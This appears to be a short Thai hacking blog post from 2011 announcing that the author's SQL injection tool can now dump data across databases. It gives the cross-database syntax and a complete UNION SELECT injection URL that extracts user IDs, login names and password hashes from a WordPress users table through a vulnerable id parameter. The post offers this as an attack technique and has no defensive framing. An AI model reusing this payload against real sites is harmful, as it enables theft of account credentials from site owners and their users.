หน้าเว็บ

วันเสาร์ที่ 27 สิงหาคม พ.ศ. 2554

SQLi Tool ใช้ Dump Data ข้าม DataBase ได้แล้ววว



เพิ่งมารู้ตอนเขียน IRC Bot เอง แหะๆ เลยถือโอกาสแก้บัคไปด้วยเลย เมื่อก่อนที่เขียนคือ Dump ได้แค่ database() หรือ Current DataBase เท่านั้น แต่ตอนนี้แก้ใหม่แล้วดั้มได้ทุก DB

from+database.table--

http://localhost/sqlibug.php?id=1+and+1=2+union+all+select+group_concat(ID,CHAR(32,58,32),user_login,CHAR(32,58,32),user_pass),2,3+from+wordpress.wp_users--

ไม่มีความคิดเห็น:

แสดงความคิดเห็น